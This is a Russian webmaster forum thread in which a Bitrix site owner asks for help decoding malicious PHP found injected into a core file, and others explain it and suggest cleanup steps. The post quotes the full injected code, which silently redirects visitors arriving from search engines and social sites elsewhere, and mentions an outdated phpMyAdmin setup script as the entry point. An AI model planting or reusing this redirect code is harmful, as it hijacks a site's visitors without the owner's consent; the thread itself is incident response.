- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте.
Столкнулись с проблемой.
Есть сайт на Bitrix, крутится на VPS Linux Debian.
Сегодня на сайте был обнаружен вреденосный код, антивирус Касперского выдал:
URL-адрес , содержащий вредоносную программу, запрещен
В одном из файлов PHP был обнаружен код:
Вопрос собственно такой - помогите раскодировать данный фрагмент кода.
Заранее благодарен.
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: "); exit(); } } } }Спасибо.
Я в PHP не силен, что делает данный код ?
Спасибо.
Я в PHP не силен, что делает данный код ?
Ошибочка вышла )
Данный код перекидывает посетителей, пришедших с поисковых систем, на
Вообщем, сидим разбираемся.
Ситуация пока такая: когда удаляем данный код из PHP файла, то все нормально.
Но через 15 минут он восстанавливается.
Права на файл стоят 644.
Файл расположен по адресу: /var/www/ftpnew/data/www/schekino.ru/bitrix/modules/main/classes/mysql
код самого файла:
Когда используется зараженный файл, то браузер выдает ошибку, как я понимаю, связанную с тем, что не заэкранирована скобка.
Вопрос, с чем может быть связана постоянные изменения файла и может ли на сайте быть шелл ?
Сервер весь ваш? Если да, закажите уж аудит безопасности.
может шел, а может и доступ обычный к фтп есть у кого то, а может и в скрипте дырка какая то, смотрите логи, там все написано
Ну как бы, в битриксе есть такая замечательная штука как контроль целостности, но если вы никогда его не делали, то уже поздно.
Ищите все файлы с поздней датой изменения/создания, может найдете шелл. Можно просмотреть серверный лог, поискать там post запросы, содержащие шелл-команды типа "ls", тоже можно найти шеллы, если они есть.
А вообще судя по "качеству внедрения" вируса могу предположить что вам заодно засунули агента, который этот файл с вирусным кодом и восстанавливает.
Какие логи и в каких папках читать ?
VPS на Debian.
Заранее благодарен.
profAleks добавил 06.09.2011 в 12:45
Нашел.
Взлом был через устаревшую версию MySQL.
Использовали файл /PHPMyAdmin/scripts/setup.php
ссылка по теме
еще одна
Всем спасибо за поддержку.
profAleks добавил 06.09.2011 в 12:47
PHPMAdmin тоесть, а не MySQL.